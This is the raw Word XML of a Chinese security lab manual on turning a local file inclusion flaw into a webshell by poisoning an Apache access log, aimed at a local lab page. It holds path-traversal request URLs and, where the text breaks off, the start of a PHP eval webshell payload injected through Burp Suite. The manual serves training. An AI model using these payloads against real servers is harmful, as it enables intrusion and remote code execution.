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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>本地文件包含之包含日志获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>预备知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，无须再次编写，这种调用文件的过程称为包含。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>学会包含日志获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户机一台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1、访问http://</w:t>
      </w:r>
      <w:r w:rsidR="0004411D">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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40370D6F" wp14:editId="1B0B322B">
            <wp:extent cx="4714875" cy="1890451"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="图片 69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89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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0004411D">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>/FI/PHP_FI.php?filename=../../../../../boot.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以查看c:/boot.ini的信息,确认有本地文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1790631B" wp14:editId="1936C13A">
            <wp:extent cx="4867275" cy="1788333"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="68" name="图片 68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78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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、尝试访问其他常见的路径，比如access.log，访问http://</w:t>
      </w:r>
      <w:r w:rsidR="0004411D">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/FI/PHP_FI.php?filename=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/../../../../Program%20Files/phpStudy/Apache/logs/access.log可以访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649F8D4F" wp14:editId="57FCF53A">
            <wp:extent cx="3600450" cy="2611079"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="图片 67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83" cy="261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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4、浏览器设置代理服务的步骤：点击网页右上角，选择【选项】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5890A2" wp14:editId="46B1532B">
            <wp:extent cx="4981575" cy="3618635"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="66" name="图片 66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6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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>【高级】—【网络】—【设置】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BD07AEE" wp14:editId="2808BBED">
            <wp:extent cx="4819650" cy="2660309"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="65" name="图片 65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66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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>选择【手动配置代理】，输入HTTP代理127.0.0.1，端口8080，清空不使用代理下方的文本框，点击确定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721E472A" wp14:editId="0E9D0ED2">
            <wp:extent cx="2744015" cy="3228975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="图片 64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01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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>双击桌面的【实验手册】，打开【burpsuite_pro_v1.5.14.jar】,点击【OK】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4E4BCE" wp14:editId="68BEFC8B">
            <wp:extent cx="5076825" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="63" name="图片 6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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击【I Accept】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01EB511E" wp14:editId="3B939F99">
            <wp:extent cx="3419475" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="62" name="图片 6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1CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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</w:p>
    <w:p w:rsidR="005901CC" w:rsidRPr="008E0FBB" w:rsidRDefault="005901CC" w:rsidP="005901CC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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>刷新浏览器的http://</w:t>
      </w:r>
      <w:r w:rsidR="0004411D">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/FI/PHP_FI.php?filename=LFI.txt网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>自动抓包，修改为如下。命令是&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
